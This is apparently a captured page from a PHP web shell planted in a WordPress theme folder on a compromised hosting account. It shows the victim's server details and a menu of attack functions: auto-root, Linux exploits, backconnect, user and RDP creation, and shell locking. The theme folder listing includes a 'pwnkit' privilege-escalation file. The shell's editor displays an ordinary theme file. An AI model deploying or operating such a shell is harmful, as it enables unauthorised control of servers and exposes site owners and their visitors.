Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
mindscape /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
class-tgm-plugin-activation.ph...
121.85
KB
-rw-r--r--
customizer-headers.php
76.23
KB
-rw-r--r--
defaults.php
40.99
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
safari-polyfills.php
2.66
KB
-rw-r--r--
template-defaults.php
13.85
KB
-rw-r--r--
template-functions.php
6.12
KB
-rw-r--r--
theme-translations.php
23
B
-rw-r--r--
translations.php
21.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : safari-polyfills.php
<?php use Wolfcast\BrowserDetection; function mindscape_safari_polyfills() { if ( apply_filters( 'kubio_is_enabled', false ) ) { return; } $browser = new BrowserDetection(); $version = $browser->getVersion(); $os_version = $browser->getPlatformVersion( true ); $is_safari_without_gap_support = false; // because every browser on iOS is actually Safari we just check for the iOS version if ( $browser->getPlatform() === BrowserDetection::PLATFORM_IOS && version_compare( $os_version, '14.5', '<' ) ) { $is_safari_without_gap_support = true; } if ( $browser->getPlatform() === BrowserDetection::PLATFORM_MACINTOSH && $browser->getName() === BrowserDetection::BROWSER_SAFARI && $browser->compareVersions( $version, '14' ) <= 1 ) { $is_safari_without_gap_support = true; } if ( $is_safari_without_gap_support ) { add_action( 'wp_head', function () { ?> <script> (function () { var flex = document.createElement('div'); flex.style.display = 'flex'; flex.style.flexDirection = 'column'; flex.style.rowGap = '1px'; // create two, elements inside it flex.appendChild(document.createElement('div')); flex.appendChild(document.createElement('div')); // append to the DOM (needed to obtain scrollHeight) document.documentElement.appendChild(flex); var isSupported = flex.scrollHeight === 1; // flex container should be 1px high from the row-gap flex.parentNode.removeChild(flex); if (!isSupported) { console.warn('Kubio - Browser does not support flex gap '); document.documentElement.classList.add('kubio-enable-gap-fallback'); } })(); </script> <?php }, 5 ); } if ( $browser->getPlatform() === BrowserDetection::PLATFORM_IOS || $browser->getPlatform() === BrowserDetection::PLATFORM_MACINTOSH ) { add_action( 'wp_head', function () { ?> <script> (function () { var docEL = document.documentElement; var style = docEL.style; if (!("backgroundAttachment" in style)) return false; var oldValue = style.backgroundAttachment; style.backgroundAttachment = "fixed"; var isSupported = (style.backgroundAttachment === "fixed"); style.backgroundAttachment = oldValue; if (navigator.userAgent.toLowerCase().indexOf('mac') !== -1 && navigator.maxTouchPoints) { isSupported = false; } if (!isSupported) { console.warn('Kubio - Browser does not support attachment fix'); document.documentElement.classList.add('kubio-attachment-fixed-support-fallback'); } })() </script> <?php }, 5 ); } } add_action( 'init', 'mindscape_safari_polyfills' );
Close